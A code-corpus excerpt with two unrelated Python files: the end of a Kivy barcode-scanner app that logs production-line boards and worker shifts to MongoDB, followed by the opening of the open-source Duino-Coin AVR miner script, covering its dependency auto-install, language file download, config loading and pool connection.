size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[2]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[3]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[4]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[5]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[6]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[7]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[8]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[9]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
BoxLayout:
orientation: 'vertical'
Label:
id: cut00
text: '0'
color: 1,0,0,1
Label:
id: cut01
text: '0'
color: 1,0,0,1
Label:
id: cut02
text: '0'
color: 1,0,0,1
Label:
id: cut03
text: '0'
color: 1,0,0,1
Label:
id: cut04
text: '0'
color: 1,0,0,1
Label:
id: cut05
text: '0'
color: 1,0,0,1
Label:
id: cut06
text: '0'
color: 1,0,0,1
Label:
id: cut07
text: '0'
color: 1,0,0,1
Label:
id: cut08
text: '0'
color: 1,0,0,1
Label:
id: cut09
text: '0'
color: 1,0,0,1
BoxLayout:
orientation: 'vertical'
Label:
text: root.board_name_list[10]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[11]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[12]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[13]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[14]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[15]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[16]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[17]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[18]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[19]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
BoxLayout:
orientation: 'vertical'
Label:
id: cut10
text: '0'
color: 1,0,0,1
Label:
id: cut11
text: '0'
color: 1,0,0,1
Label:
id: cut12
text: '0'
color: 1,0,0,1
Label:
id: cut13
text: '0'
color: 1,0,0,1
Label:
id: cut14
text: '0'
color: 1,0,0,1
Label:
id: cut15
text: '0'
color: 1,0,0,1
Label:
id: cut16
text: '0'
color: 1,0,0,1
Label:
id: cut17
text: '0'
color: 1,0,0,1
Label:
id: cut18
text: '0'
color: 1,0,0,1
Label:
id: cut19
text: '0'
color: 1,0,0,1
BoxLayout:
orientation: 'vertical'
Label:
text: root.board_name_list[20]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[21]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[22]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[23]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[24]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[25]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[26]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[27]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[28]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[29]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
BoxLayout:
orientation: 'vertical'
Label:
id: cut20
text: '0'
color: 1,0,0,1
Label:
id: cut21
text: '0'
color: 1,0,0,1
Label:
id: cut22
text: '0'
color: 1,0,0,1
Label:
id: cut23
text: '0'
color: 1,0,0,1
Label:
id: cut24
text: '0'
color: 1,0,0,1
Label:
id: cut25
text: '0'
color: 1,0,0,1
Label:
id: cut26
text: '0'
color: 1,0,0,1
Label:
id: cut27
text: '0'
color: 1,0,0,1
Label:
id: cut28
text: '0'
color: 1,0,0,1
Label:
id: cut29
text: '0'
color: 1,0,0,1
BoxLayout:
orientation: 'vertical'
Label:
text: root.board_name_list[30]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[31]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[32]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[33]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[34]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[35]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[36]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[37]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[38]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[39]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
BoxLayout:
orientation: 'vertical'
Label:
id: cut30
text: '0'
color: 1,0,0,1
Label:
id: cut31
text: '0'
color: 1,0,0,1
Label:
id: cut32
text: '0'
color: 1,0,0,1
Label:
id: cut33
text: '0'
color: 1,0,0,1
Label:
id: cut34
text: '0'
color: 1,0,0,1
Label:
id: cut35
text: '0'
color: 1,0,0,1
Label:
id: cut36
text: '0'
color: 1,0,0,1
Label:
id: cut37
text: '0'
color: 1,0,0,1
Label:
id: cut38
text: '0'
color: 1,0,0,1
Label:
id: cut39
text: '0'
color: 1,0,0,1
""")
class MessageWindow(Popup):
    """Popup that keeps its label in sync with the global `last_message`."""

    def __init__(self, **kwargs):
        super(MessageWindow, self).__init__(**kwargs)
        # Refresh the displayed text five times per second.
        Clock.schedule_interval(self.update, 0.2)

    def update(self, *args):
        """Copy the most recent broadcast message into the popup label."""
        global last_message
        label = self.ids['messagetext']
        label.text = last_message
class InfoWindow(Popup):
    """Popup showing every board slot name next to its pending-work count."""

    # Human-readable names for board slots 00-39 (referenced by the KV rules).
    board_name_list = ['00 - OSTRICH S S', '01 - OSTRICH M S', '02 - JUNKO M', '03 - CHAUMA M S', '04 - CHAUMA W S',
                       '05 - BUNTING', '06 - WROBEL', '07 - FLAMINGO M S', '08 - FLAMINGO S S', '09 - FANTAIL',
                       '10 - VERDIN S', '11 - STARLING', '12 - ERGET S S', '13 - ERGET M S', '14 - KAROO M S',
                       '15 - KAROO M', '16 - FLAMINGO MEDIUM', '17 - OSTRICH MEDIUM', '18 - VERDIN MEDIUM', '19 - ERGET MEDIUM',
                       '20 - CHAUMA W', '21 - CHAUMA M', '22 - EMPTY', '23 - EMPTY', '24 - EMPTY',
                       '25 - EMPTY', '26 - EMPTY', '27 - EMPTY', '28 - EMPTY', '29 - EMPTY',
                       '30 - EMPTY', '31 - EMPTY', '32 - EMPTY', '33 - EMPTY', '34 - EMPTY',
                       '35 - EMPTY', '36 - EMPTY', '37 - EMPTY', '38 - EMPTY', '39 - EMPTY', ]
    # Divisor used by the KV rules to scale the board-name label font size.
    board_name_text_scale = 7

    def __init__(self, **kwargs):
        super(InfoWindow, self).__init__(**kwargs)

    def popup_count(self):
        """Fill the first 20 counter labels with the number of boards still
        to be finished for each two-digit model code ("00".."19")."""
        global lis_window
        for idx in range(20):
            model_id = str(idx).zfill(2)  # same "0"-padded code the DB stores
            code_win[idx] = self.ids[lis_window[idx]]
            # TODO (original note): the collection queried differs per station.
            code_win[idx].text = str(collection_tofinish.find({"model": model_id}).count())
class MainWindow(Screen):
    """Main scanner screen.

    Polls the serial barcode scanner on a timer, records scanned boards in
    MongoDB, tracks the active worker's shift time and keeps the on-screen
    history labels up to date. Also handles the "second category" and
    "comment" side-workflows armed by their respective buttons.
    """

    def __init__(self, **kwargs):
        super(MainWindow, self).__init__(**kwargs)
        # Poll the scanner / UI state on fixed intervals.
        Clock.schedule_interval(self.main_handling, 0.2)
        Clock.schedule_interval(self.display_message, 2)
        Clock.schedule_interval(self.th, 1)

    def message_read(self, *args):
        """Read a broadcast message from the TCP socket into global `message`."""
        global message
        try:
            message = s.recv(512)
            message = message.decode('utf-8')
            message = str(message)
        except Exception:
            # Best effort: no data / socket timeout leaves `message` unchanged.
            # (Narrowed from a bare `except:` so Ctrl+C is not swallowed.)
            pass

    def th(self, *args):
        # threading.Thread(target=self.message_read).start()
        self.message_read()

    def display_message(self, *args):
        """Open a popup whenever a new broadcast message has arrived."""
        global message
        global last_message
        if (message != ""):
            last_message = message
            MessageWindow().open()
            message = ""

    def show_info(self, *args):
        """Open the board-count info popup."""
        InfoWindow().open()

    def serial_write(self, data_to_send):
        """Send `data_to_send` to the scanner module over the serial port."""
        MasterModule.write(str(data_to_send).encode('utf-8'))
        MasterModule.flush()
        time.sleep(0.01)

    def serial_clear(self):
        """Drop any bytes currently waiting in the serial input buffer."""
        if (MasterModule.inWaiting() > 0):
            MasterModule.read(MasterModule.inWaiting())
        MasterModule.flush()

    def serial_read(self):
        """Return whatever bytes are currently waiting on the serial port."""
        myData = MasterModule.read(MasterModule.inWaiting())
        return myData

    def ask_data(self):
        """Poll the scanner using the AC1E / AD..E / AC2E handshake.

        Returns the 16-character payload on success, 0 when the scanner has
        nothing to report, and -1 after three failed confirmation rounds.
        """
        readData = ""
        sendConfirmation = ""
        readConfirmation = ""
        counter = 0
        while (readConfirmation[0:4] != 'AC2E' or counter < 3):
            readData = ""
            sendConfirmation = ""
            readConfirmation = ""
            self.serial_clear()
            self.serial_write('AC1E')
            time.sleep(0.01)
            # readData = self.serial_read().decode()
            readData = self.serial_read().decode(encoding='UTF-8', errors='ignore')
            if (readData[0:1] != '0'):
                # Non-empty payload: acknowledge it and wait for AC2E.
                sendConfirmation = 'AD' + str(readData[8:17]) + 'E'
                self.serial_clear()
                self.serial_write(sendConfirmation)
                time.sleep(0.01)
                readConfirmation = self.serial_read().decode()
                if (readConfirmation[0:4] == 'AC2E'):
                    return readData[1:17]
                else:
                    counter = counter + 1
                    if (counter == 3):
                        return -1
            else:
                return 0

    def label_handling(self):
        """Shift the ten history labels down one slot and insert the newest record."""
        global label_list
        global current_code
        global current_time
        global last_record
        global data
        n = 9
        while n > 0:
            m = n - 1
            code[n] = self.ids[label_list[n]]
            code[m] = self.ids[label_list[m]]
            code[n].text = code[m].text
            n = n - 1
        code[0] = self.ids[label_list[0]]
        code[0].text = str(last_record)
        current_code.text = str(data[3:15])
        current_time.text = str(datetime.datetime.now().strftime('%H:%M:%S'))
        last_record = current_time.text + " " + current_code.text

    def nd2category(self):
        """Arm second-category mode: the next scanned board goes to 2nd category."""
        global sec
        global worker
        print(" 2 nd category button pressed")
        if (worker != ""):
            current_code = self.ids['last_code']
            status_label = self.ids['status']
            current_time = self.ids['last_code_time']
            current_code.text = ''
            status_label.text = 'SCAN CODE'
            current_time.text = ''
            sec = 1

    def addcoment(self):
        """Arm comment mode: the next scanned board gets the typed comment attached."""
        global com
        global worker
        print(" add comment button pressed")
        if (worker != ""):
            current_code = self.ids['last_code']
            status_label = self.ids['status']
            current_time = self.ids['last_code_time']
            current_code.text = 'TYPE COMMENT '
            status_label.text = 'SCAN CODE'
            current_time.text = 'AND'
            com = 1

    def data_check(self):  # TODO: collection is station-specific
        """Poll until the scanned code appears in the station collection.

        Sets data_added to 1 on success, -1 after nine failed polls.
        """
        global data_added
        is_present = 0
        check_counter = 0
        while (is_present == 0):
            is_present = collection_04.find({"code": read_code}).count()
            if (is_present > 0):
                data_added = 1
                break
            else:
                check_counter += 1
                if (check_counter > 8):
                    data_added = -1
                    break

    def comm_check(self):  # TODO: collection is station-specific
        """Poll until the scanned code appears in the to-stock collection.

        Sets comm_added to 1 on success, -1 after nine failed polls.
        """
        global comm_added
        is_present = 0
        check_counter = 0
        while (is_present == 0):
            is_present = collection_tostock.find({"code": read_code}).count()
            if (is_present > 0):
                comm_added = 1
                break
            else:
                check_counter += 1
                if (check_counter > 8):
                    comm_added = -1
                    break

    def comment_check(self):
        """Poll until the comment with the current timestamp is stored.

        Sets comment_added to 1 on success, -1 after nine failed polls.
        """
        global comment_added
        is_present = 0
        check_counter = 0
        while (is_present == 0 and comment_added == 0):
            is_present = comments.find({"timestamp": timestamp}).count()
            if (is_present > 0):
                comment_added = 1
                break
            else:
                check_counter += 1
                if (check_counter > 8):
                    comment_added = -1
                    break

    def main_handling(self, *args):
        """Main polling loop: read the scanner and dispatch to the normal,
        second-category or comment workflow depending on the armed mode."""
        global code
        global worker
        global current_code
        global machine_state
        global current_time
        global last_record
        global message
        global data
        global time_tcp
        global code_tcp
        global read_code
        global timestamp
        global data_added
        global comm_added
        global comment_added
        global sec
        global com
        global worker_time_start
        global worker_time_stop
        current_code = self.ids['last_code']
        status_label = self.ids['status']
        current_time = self.ids['last_code_time']
        worker_label = self.ids['worker_label']
        comment_label = self.ids['comment']
        data = self.ask_data()
        comment_added = 0
        comm_added = 0
        data_added = 0
        if (machine_state == 0 and data == 0):
            # Scanner reachable but idle: prompt for a worker badge.
            status_label.text = 'CONNECTED'
            current_code.text = 'SCAN WORKER CARD'
            machine_state = 1
        if (data != 0 and data != -1):
            worker_name = list(staff.find({"code": data[3:15]}, {"name": 1, "_id": 0}))
            worker_name = str(worker_name)
            timestamp = str(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))
            read_code = str(data[3:15])
            model = data[5:7]
            if (len(worker_name) > 2 and sec == 0 and com == 0):
                # A staff badge was scanned: toggle the active worker.
                worker_name = worker_name[11:len(worker_name) - 3]
                if (worker != ""):
                    # Close out the previous worker's shift and store its duration.
                    worker_time_stop = datetime.datetime.now()
                    print('stop time: ' + str(worker_time_stop))
                    print('worker finish work: ' + worker)
                    t = str(round((worker_time_stop - worker_time_start).total_seconds() / 60))
                    worker_time = {
                        "worker": worker,
                        "finish": timestamp,
                        "start": str(worker_time_start),
                        "time": t,
                        "station": "03"
                    }
                    collection_workertime.insert_one(worker_time)
                if (worker_name == worker):
                    # Same badge again: log the worker out.
                    current_time.text = '-'
                    worker_label.text = "-"
                    worker = ""
                    machine_state = 0
                else:
                    worker_time_start = datetime.datetime.now()
                    print('start time: ' + str(worker_time_start))
                    worker = worker_name
                    worker_label.text = worker
                    current_code.text = 'READY TO WORK'
                    status_label.text = 'CONNECTED'
                    print('setting worker to: %s' % worker_name)
                    current_time.text = str(datetime.datetime.now().strftime('%H:%M:%S'))
            else:
                if (worker != ""):
                    if (sec == 0 and com == 0):
                        # Normal workflow: record the board once per station.
                        if (collection_04.find({"code": read_code}).count() == 0):  # TODO: station-specific
                            new_data = {
                                "timestamp": timestamp,
                                "year_number": str(datetime.datetime.now().strftime('%j')),
                                "year": str(datetime.datetime.now().strftime('%Y')),
                                "month": str(datetime.datetime.now().strftime('%m')),
                                "day": str(datetime.datetime.now().strftime('%d')),
                                "hour": str(datetime.datetime.now().strftime('%H')),
                                "minute": str(datetime.datetime.now().strftime('%M')),
                                "second": str(datetime.datetime.now().strftime('%S')),
                                "code": read_code,
                                "model": model,
                                "worker": worker,
                                "operation": "04",  # TODO: station-specific
                            }
                            collection_04.insert_one(new_data)  # TODO: station-specific
                            print("added to 04 base : " + read_code)  # TODO: station-specific
                            new_data2 = {
                                "code": read_code,
                                "model": model
                            }
                            collection_tostock.insert_one(new_data2)  # TODO: station-specific
                            collection_evermade.insert_one(new_data2)  # TODO: station-specific; added 2017-03-02
                            # Remove the board from the previous station's queue;
                            # careful at station 00.
                            i = db.tofinish.delete_many({"code": read_code}).deleted_count  # TODO: station-specific
                            if (i < 1):
                                missing_code = {
                                    "code": read_code,
                                    "model": model,
                                    "missing": "03",  # TODO: station-specific
                                    "timestamp": timestamp
                                }
                                collection_missingcodes.insert_one(missing_code)
                                print("missing in 03 base : " + read_code)  # TODO: station-specific
                            if(str(comment_label.text) != ''):
                                comm = {
                                    "timestamp": timestamp,
                                    "code": read_code,
                                    "model": model,
                                    "worker": worker,
                                    "comment": comment_label.text
                                }
                                comments.insert_one(comm)
                                comment_added = 1
                            else:
                                comment_added = 1
                            # Verification polls disabled: Mongo already confirms
                            # the writes; distinct messages per failure could be
                            # added later.
                            data_added = 1  # self.data_check()
                            comm_added = 1  # self.comm_check()
                            comment_added = 1  # self.comment_check()
                            if (data_added == 1 and comm_added == 1 and comment_added == 1):
                                self.label_handling()
                                status_label.text = 'WRITED'
                                code_tcp = str(data[3:15])
                                time_tcp = timestamp
                                comment_label.text = ""
                                current_code.text = read_code
                                current_time.text = timestamp[11:19]
                                print(read_code + " " + timestamp)
                        else:
                            current_code.text = read_code
                            current_time.text = str(datetime.datetime.now().strftime('%H:%M:%S'))
                            status_label.text = 'DUPLICATED'
                            print('element duplicated %s' % str(read_code))
                    if (sec == 1):
                        # Second-category workflow (armed via nd2category()).
                        if (staff.find({"code": read_code}).count() == 0):
                            if (second_category.find({"code": read_code}).count() == 0):
                                nd2data = {
                                    "code": read_code,
                                    "timestamp": timestamp,
                                    "model": model
                                }
                                second_category.insert_one(nd2data)
                                print('board added to 2nd cat: ' + read_code)
                                status_label.text = 'ADDED 2ND CAT'
                                current_code.text = read_code
                                current_time.text = timestamp[11:19]
                                sec = 0
                            else:
                                status_label.text = 'ALREADY ADDED'
                                current_code.text = read_code
                                current_time.text = timestamp[11:19]
                                sec = 0
                        else:
                            print('error scanning worker card')
                            status_label.text = 'SECOND CAT'
                            current_code.text = 'PEOPLE ARE NOT'
                            current_time.text = timestamp[11:19]
                            sec = 0
                    if (com == 1):
                        # Comment workflow (armed via addcoment()).
                        if (comment_label.text == ""):
                            status_label.text = 'COMMENT EMPTY !'
                            current_code.text = 'ERROR'
                            current_time.text = timestamp[11:19]
                            com = 0
                        if (comment_label.text != ""):
                            com_data = {
                                "code": read_code,
                                "timestamp": timestamp,
                                "comment": comment_label.text,
                                "model": model
                            }
                            comments.insert_one(com_data)
                            print('insert comment: ' + comment_label.text)
                            status_label.text = 'ADDED COMMENT'
                            current_code.text = read_code
                            current_time.text = timestamp[11:19]
                            comment_label.text = ""
                            com = 0
                else:
                    current_time.text = str(datetime.datetime.now().strftime('%H:%M:%S'))
                    status_label.text = 'NO WORKER SCANNED'
class ScanApp(App):
    """Kivy application: shows the main window and forwards scans over TCP."""

    def __init__(self, **kwargs):
        super(ScanApp, self).__init__(**kwargs)
        # Push pending scan data to the TCP peer twice per second.
        Clock.schedule_interval(self.send_tcp, 0.5)

    def send_tcp(self, *args):
        """Send the latest scan frame, or a single zero frame after it."""
        global time_tcp
        global code_tcp
        global worker
        global send_zero
        if (time_tcp != "1" and code_tcp != "1"):
            payload = '!' + time_tcp + '*' + '/' + code_tcp + '*' + ';' + worker + '*' + '$' + '1' + '*'
            s2.sendall(str.encode(payload))
            # Mark the frame as consumed and schedule the trailing zero frame.
            code_tcp = "1"
            time_tcp = "1"
            send_zero = 1
        elif (send_zero == 1):
            s2.sendall(str.encode('*' + '$' + '0'))
            send_zero = 0

    def build(self):
        """Return the root widget."""
        return MainWindow()
if __name__ == '__main__':
    # Launch the Kivy scanner application (blocks until the window closes).
    ScanApp().run()
|
AVR_Miner.py | #!/usr/bin/env python3
##########################################
# Duino-Coin Python AVR Miner (v2.47)
# https://github.com/revoxhere/duino-coin
# Distributed under MIT license
# © Duino-Coin Community 2019-2021
##########################################
# Import libraries
import sys
from configparser import ConfigParser
from datetime import datetime
from json import load as jsonload
from locale import LC_ALL, getdefaultlocale, getlocale, setlocale
from os import _exit, execl, mkdir
from os import name as osname
from os import path
from os import system as ossystem
from pathlib import Path
from platform import system
from re import sub
from signal import SIGINT, signal
from socket import socket
from subprocess import DEVNULL, Popen, check_call
from threading import Thread as thrThread
from threading import Lock
from time import ctime, sleep, strptime, time
import select
def install(package):
    """Install *package* with pip, then re-exec the miner so it is picked up."""
    pip_cmd = [sys.executable, "-m", "pip", "install", package]
    check_call(pip_cmd)
    # Replace the current process with a fresh interpreter run.
    execl(sys.executable, sys.executable, *sys.argv)
def now():
    """Return the current local date and time as a datetime object."""
    current = datetime.now()
    return current
# --- startup bootstrap: auto-install optional deps, fetch resources, pick language ---
try:
    # Check if pyserial is installed
    from serial import Serial
    import serial.tools.list_ports
except ModuleNotFoundError:
    print(
        now().strftime("%H:%M:%S ")
        + 'Pyserial is not installed. '
        + 'Miner will try to install it. '
        + 'If it fails, please manually install "pyserial" python3 package.'
        + '\nIf you can\'t install it, use the Minimal-PC_Miner.')
    install("pyserial")
try:
    # Check if colorama is installed
    from colorama import Back, Fore, Style, init
except ModuleNotFoundError:
    print(
        now().strftime("%H:%M:%S ")
        + 'Colorama is not installed. '
        + 'Miner will try to install it. '
        + 'If it fails, please manually install "colorama" python3 package.'
        + '\nIf you can\'t install it, use the Minimal-PC_Miner.')
    install("colorama")
try:
    # Check if requests is installed
    import requests
except ModuleNotFoundError:
    print(
        now().strftime("%H:%M:%S ")
        + 'Requests is not installed. '
        + 'Miner will try to install it. '
        + 'If it fails, please manually install "requests" python3 package.'
        + '\nIf you can\'t install it, use the Minimal-PC_Miner.')
    install("requests")
try:
    # Check if pypresence is installed
    from pypresence import Presence
except ModuleNotFoundError:
    print(
        now().strftime("%H:%M:%S ")
        + 'Pypresence is not installed. '
        + 'Miner will try to install it. '
        + 'If it fails, please manually install "pypresence" python3 package.'
        + '\nIf you can\'t install it, use the Minimal-PC_Miner.')
    install("pypresence")
# Global variables
MINER_VER = "2.47"  # Version number
SOCKET_TIMEOUT = 30
AVR_TIMEOUT = 7
RESOURCES_DIR = "AVRMiner_" + str(MINER_VER) + "_resources"
shares = [0, 0]
diff = 0
donator_running = False
job = ""
debug = "n"
rig_identifier = "None"
# Serverip file
server_ip_file = ("https://raw.githubusercontent.com/"
                  + "revoxhere/"
                  + "duino-coin/gh-pages/serverip.txt")
donation_level = 0
hashrate = 0
config = ConfigParser()
thread_lock = Lock()
# Create resources folder if it doesn't exist
if not path.exists(RESOURCES_DIR):
    mkdir(RESOURCES_DIR)
# Check if languages file exists
if not Path(RESOURCES_DIR + "/langs.json").is_file():
    url = ("https://raw.githubusercontent.com/"
           + "revoxhere/"
           + "duino-coin/master/Resources/"
           + "AVR_Miner_langs.json")
    r = requests.get(url)
    with open(RESOURCES_DIR + "/langs.json", "wb") as f:
        f.write(r.content)
# Load language file
# (note: the name `lang_file` is rebound from file handle to parsed dict)
with open(RESOURCES_DIR + "/langs.json", "r", encoding="utf8") as lang_file:
    lang_file = jsonload(lang_file)
# OS X invalid locale hack
if system() == 'Darwin':
    if getlocale()[0] is None:
        setlocale(LC_ALL, 'en_US.UTF-8')
# Check if miner is configured, if it isn't, autodetect language
try:
    if not Path(RESOURCES_DIR + "/Miner_config.cfg").is_file():
        locale = getdefaultlocale()[0]
        if locale.startswith("es"):
            lang = "spanish"
        elif locale.startswith("sk"):
            lang = "slovak"
        elif locale.startswith("ru"):
            lang = "russian"
        elif locale.startswith("pl"):
            lang = "polish"
        elif locale.startswith("fr"):
            lang = "french"
        elif locale.startswith("tr"):
            lang = "turkish"
        elif locale.startswith("zh"):
            lang = "chinese_simplified"
        else:
            lang = "english"
    else:
        try:
            # Read language from configfile
            config.read(RESOURCES_DIR + "/Miner_config.cfg")
            lang = config["arduminer"]["language"]
        except Exception:
            # If it fails, fallback to english
            lang = "english"
except:
    lang = "english"
def get_string(string_name):
    """Look up a translated UI string, falling back to English, then to a
    visible "String not found" marker."""
    for table in (lang_file[lang], lang_file["english"]):
        if string_name in table:
            return table[string_name]
    return "String not found: " + string_name
def debug_output(text):
    """Print a timestamped debug line, but only when debug mode is "y"."""
    if debug != "y":
        return
    print(
        Style.RESET_ALL
        + now().strftime(Style.DIM + "%H:%M:%S.%f ")
        + "DEBUG: "
        + str(text))
def title(title):
    """Set the terminal/console window title (Windows and ANSI terminals)."""
    if osname == "nt":
        # Windows console: use the `title` shell builtin.
        ossystem("title " + title)
        return
    # Most standard terminals understand the OSC 0 escape sequence.
    print("\33]0;" + title + "\a", end="")
    sys.stdout.flush()
def connect():
    """Connect to the pool server and return the connected socket.

    Retries every 10 s on failure. Also reads the server's advertised
    version and warns when this miner is outdated.
    """
    global server_ip
    global server_port
    soc = None
    while True:
        try:
            # Close the previous attempt's socket (if any) so retries don't
            # leak file descriptors. The original called `socket.close()` on
            # the *class*, which always raised and was silently swallowed.
            if soc is not None:
                try:
                    soc.close()
                except Exception:
                    pass
            debug_output("Connecting to "
                         + str(server_ip)
                         + str(":")
                         + str(server_port))
            soc = socket()
            soc.settimeout(SOCKET_TIMEOUT)
            # Establish socket connection to the server
            soc.connect(
                (str(server_ip),
                 int(server_port)))
            # Get server version
            ready = select.select([soc], [], [], SOCKET_TIMEOUT)
            if ready[0]:
                serverVersion = soc.recv(10).decode().rstrip("\n")
                debug_output("Server version: " + serverVersion)
                if float(serverVersion) <= float(MINER_VER):
                    # If miner is up-to-date, display a message and continue
                    pretty_print(
                        "net0",
                        get_string("connected")
                        + Style.NORMAL
                        + Fore.RESET
                        + get_string("connected_server")
                        + str(serverVersion)
                        + ")",
                        "success")
                    break
                else:
                    pretty_print(
                        "sys0",
                        " Miner is outdated (v"
                        + MINER_VER
                        + ") -"
                        + get_string("server_is_on_version")
                        + serverVersion
                        + Style.NORMAL
                        + Fore.RESET
                        + get_string("update_warning"),
                        "warning")
                    sleep(10)
                    break
        except Exception as e:
            pretty_print(
                "net0",
                get_string("connecting_error")
                + Style.NORMAL
                + " ("
                + str(e)
                + ")",
                "error")
            debug_output("Connection error: " + str(e))
            sleep(10)
    return soc
def handler(signal_received, frame):
    # SIGINT handler
    # Prints a goodbye message and terminates the whole process immediately.
    pretty_print(
        "sys0",
        get_string("sigint_detected")
        + Style.NORMAL
        + Fore.RESET
        + get_string("goodbye"),
        "warning")
    try:
        # Close previous socket connection (if any)
        # NOTE(review): `socket` here is the class (imported via
        # `from socket import socket`), so this call always raises and is
        # swallowed below — no live connection is actually closed.
        socket.close()
    except Exception:
        pass
    # _exit skips cleanup/atexit handlers and ends all threads at once.
    _exit(0)
# Enable signal handler
# Ctrl+C now runs handler() instead of raising KeyboardInterrupt.
signal(SIGINT, handler)
def load_config():
    """Load miner settings from Miner_config.cfg, or interactively create it.

    Populates the module-level username, avrport (list of ports),
    donation_level, debug and rig_identifier globals.
    """
    # Config loading section
    global username
    global donation_level
    global avrport
    global debug
    global rig_identifier
    # Initial configuration section
    if not Path(str(RESOURCES_DIR) + "/Miner_config.cfg").is_file():
        print(
            Style.BRIGHT
            + get_string("basic_config_tool")
            + RESOURCES_DIR
            + get_string("edit_config_file_warning"))
        print(
            Style.RESET_ALL
            + get_string("dont_have_account")
            + Fore.YELLOW
